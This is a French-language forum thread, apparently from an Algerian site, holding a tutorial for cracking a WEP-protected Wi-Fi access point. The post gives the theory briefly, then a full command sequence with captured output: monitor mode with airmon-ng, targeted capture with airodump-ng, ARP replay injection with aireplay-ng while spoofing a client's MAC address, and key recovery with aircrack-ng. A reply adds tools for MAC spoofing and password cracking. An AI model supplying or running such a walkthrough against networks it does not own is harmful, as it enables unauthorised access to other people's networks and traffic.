IL SEMBLE QUE VOUS UTILISEZ ADBLOC POUR BLOQUER LA PUBLICITÉ, AUCUNE PUB INTRUSIVE SUR FDZ ET PAS DE POPUP
FDZ EST GRATUIT DONC MERCI DE DÉSACTIVER VOTRE ADBLOCK ET DE BIEN VOULOIR PARTICIPER ET JOUER LE JEU


PAR SUITE D'ABUS LES SERVEURS CCCAM ET ABONNEMENT NE SONT PAS TOLÉRÉS SUR LE FORUM

Affichage des résultats 1 à 3 sur 3
Share |

Discussion: Cr@cké une cle WEP (injection ARP) [Reloded]

  1. #1
    Date d'inscription
    août 2010
    Localisation
    Batna
    Messages
    24
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    0

    Par défaut Cr@cké une cle WEP (injection ARP) [Reloded]

    avant tous j’espère que cette fois mon sujet ne disparaîtra pas pour je ne sais quelle raison.

    et si il est supprimé sous prétexte que c'est pas légale de parlé de sa ou bien qu'il faut pas divulgué ce genre d'informations je vous pris de supprimé le forum sécurité informatique c'est mieux vous y gagnerais en espace et en temps









    1. Cliquer ici pour agrandir
      A tester seulement dans votre réseau local
    2. -


      Scénario:

      -Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté


      logiciels requis:

      1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté

      2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA

      3-un *****er pour pouvoir déchiffré la clé wep

      je vous conseille la suite Aire.*****-ng qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, air*****-ng, airmon-ng]
      ou bien vous pouvez Utilisé la distribution
      BackTrack,(en live cd ou avec une clé usb)
      Backtrack contient tous ce qu'il faut pour ce tutoriel

      NB: je précise que j'utilise un système d'exploitation "Linux"


      Notation:

      MAC: adresse mac de ma carte wi-fi
      BSSID : adresse MAC du point d'accée
      ESSID: nom du point d'accès

      Channel: le canal du point d'accès ( de 1 jusqu'à 12)


      Un peut de théorie:

      le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits

      Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP).
      La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités.

      pour les failles on peut cité:
      - le cryptage RC4 présente des faiblesses.
      - La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications.
      - De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits.

      Pour pouvoir cr@cké cette clé WEP on vas:

      1-sniffer le réseau pour voir les points d'acceé
      2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session
      3-kr@cké les clé de session pour avoir la clé


      Pratique:

      1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng":

      [le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous]


      Code HTML:
      [root@darkstar ]# iwconfig
      lo        no wireless extensions.
      eth0      no wireless extensions.
      wmaster0  no wireless extensions.
      wlan0 IEEE 802.11bg Mode:Managed Frequency:2.462 Retry min limit:7 RTS thr:of Fragment thr=2352 

      Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed

      Code HTML:
      [root@darkstar# airmon-ng start wlan0
      Interface       Chipset         Driver
      wlan0           Atheros         ath5k - [phy0]
                                      (monitor mode enabled on mon0)

      notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle


      on peut vérifier avec iwconfig

      Code HTML:
      [root@darkstar dragoun]# iwconfig
      
      lo        no wireless extensions.
      eth0      no wireless extensions.
      wlan0    IEEE 802.11bg  ESSID:""
                   Mode:Managed  Frequency:2.412 GHz 
      
      mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz RTS thr:off Power Management:ofLink Quality:0 Signal level:0 Noise level:0
      2-Sniffer le réseau et détecté les points d'accès et les clients:


      Code HTML:
      [root@darkstar dragoun]# airodump-ng mon0
      qui me renvoi ce résultat



      Cliquer ici pour agrandir



      1: BSSID => adresse MAC du point d'accée

      2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP

      3: ENC => type de cryptage [ dans ce cas WEP]

      4: ESSID => Nom du point d'accé

      5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès

      -j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès


      maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante :

      Code HTML:
      [root@darkstar ]# airodump-ng -w /home/*****/*****-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0



      -w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par air*****-ng âpre)
      -c 1 : sniffé sur le canal 1
      -b: sniffer seulement les pâques émis par cette adresse MAC 00:90Cliquer ici pour agrandir0Cliquer ici pour agrandirC:B1:E2 (AP)
      mon0: interface a utilisé


      ce qui renvoi le résultat suivant

      Cliquer ici pour agrandir



      on remarque qu'on 1e minute on a récupéré 2077 #DATA


      pour cr@cké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus

      dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits



      3- Injecter des paquet:

      afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client)


      Code HTML:
      [root@darkstar ]# aireplay-ng -3  -e SpeedTouch345B2D -a  00:90:D0:DC:B1:E2  -h 00:19:7E:01:A3:70 mon0



      - 3: pour dire qu'il faut injecter des pâques ARP
      - e : nom du point d'accés
      - a : adresse MAC du point d'accès
      - h: adresse MAC du client (pour faire croire que les pâques viennent de lui)
      mon0: interface wi-fi


      - Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui suffit même pour une clé 128 bits

      Cliquer ici pour agrandir





      4- cr@cké les paquets:

      on récupéré le fichier enregistré avec airodump-ng et on en le ***** avec air*****-ng

      Code HTML:
      [root@darkstar ]# air*****-ng /home/*****/*****-wep-01.cap -b 00:90:D0:DC:B1:E2
      *****-wep-01.cap: fichier sur le quelle on a sauvegardé les
      pâques avec airodump-ng

      -b: adresse de AP


      Cliquer ici pour agrandir


      KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1"
    3. +
      EDIT CONTENU HORS CHARTE
      [/COLOR][FONT=&quot]
    Dernière modification par ReDhAx ; 28/08/2010 à 16h45.

  2. #2
    Date d'inscription
    août 2010
    Localisation
    Batna
    Messages
    24
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    0

    Par défaut Re : Cr@cké une cle WEP (injection ARP) [Reloded]

    pour ceux qui disent que la protection par filtrage d'adresse MAC est suffisante => http://www.alobbs.com/macchanger/
    pour ceux qui croix qu'un bon mots de passe ne peut pas être cr@cké => http://code.google.com/p/pyrit/
    pour ceux qui croix qu'on fait tts sa juste pour avoir accée a internet =>http://www.torrentreactor.net/torren...3984/DEFCON-17

  3. #3
    gameslover Visiteurs

    Par défaut Re : Cr@cké une cle WEP (injection ARP) [Reloded]

    Epic Fail !
    source ?

Discussions similaires

  1. Le site elkhabar.com infecté par une injection de iframe
    Par hAnI dans le forum Sécurité Informatique
    Réponses: 17
    Dernier message: 22/03/2009, 15h06
  2. Le site assila.net (EEPAD) infecté par une injection de iframe
    Par assilabox dans le forum Sécurité Informatique
    Réponses: 12
    Dernier message: 20/03/2009, 06h56
  3. Google cross domain frame injection vulnerability
    Par Boss_Med dans le forum Sécurité Informatique
    Réponses: 2
    Dernier message: 21/10/2008, 18h20
  4. Microsoft veut lutter contre les attaques par injection SQL
    Par mouradski dans le forum Sécurité Informatique
    Réponses: 0
    Dernier message: 22/07/2008, 14h58

Liens sociaux

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •  
[Auto utilitaire DZ] [Webimag] [Algérie Info] [Guide Algérie] [Mosquée ALBADR MEAUX] [Photographe MARIAGE]

is PageRank Checking Icon